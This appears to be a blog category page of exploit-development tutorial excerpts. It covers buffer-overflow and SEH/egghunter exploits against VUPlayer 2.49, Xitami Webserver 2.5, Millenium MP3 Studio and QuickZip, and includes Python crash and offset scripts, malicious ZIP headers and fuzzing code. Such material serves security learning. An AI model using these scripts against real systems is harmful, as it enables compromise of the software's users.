We’ll work on VUPlayer 2.49 (Windows 7) – ‘.m3u’ Local Buffer Overflow (DEP Bypass) for this article Initial exploit v1: EIP Control import sysimport structimport os crash_file = “test.m3u” fuzz = “A” * 1012fuzz += “B” * 4fuzz += “C” * (3000 – len(fuzz)) file= open(crash_file, “w”)file.write(fuzz)file.close() Start the app and attach to Immunity Drag the m3u file on… Continue reading ROP Gadgets: VirtualProtect()
Category: Exploit Dev
Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Fuzzing get HTTP request GET / HTTP/1.1Host: 192.168.1.9User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0 Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txtVulnerable:If-Modified-Since: Wed, <fuzzing-payload> s_string(“If-Modified-Since: Sat,”, name=”If-Modified-Since”, fuzzable = False)s_delim(” “, name=”space-10”, fuzzable = False)s_string(“15 Jun 2019 01:36:09… Continue reading Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
Crash #!/usr/bin/pythonfile = “kalisa.mpf”buffer = “http://” + “A” * 5000f = open(file,’w’)f.write(buffer)f.close() Offset #!/usr/bin/pythonfile = “kalisa.mpf”buffer = “http://” + “A”*4105+”B”* 4+”C”*1000f = open(file,’w’)f.write(buffer)f.close() pop -pop -ret Stack nseh (4 bytes) seh (4 bytes) other (4 bytes) other (4 bytes) other (4 bytes) other(4 bytes) hole (4 bytes) other (4 bytes) shellcode starts here So “jmp… Continue reading Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
SEH + Egghunter QuickZip Exploit
Initial Script #!/usr/bin/pythonheader_1 = (“\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00”)header_2 = (“\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00″”\x24\x00\x00\x00\x00\x00\x00\x00”)header_3 = (“\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00″”\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00”)payload = “A” * 4064payload += “.txt”exploit = header_1 + payload + header_2 + payload + header_3myfile = open(‘kalisa.zip’,’w’);myfile.write(exploit);myfile.close() Crash Open the zip file, attach immunity, try to extract (where the crash happens) Offset SEH Chain After Shift + F9 Seh chain again Offset EIP Control POP-POP-RET… Continue reading SEH + Egghunter QuickZip Exploit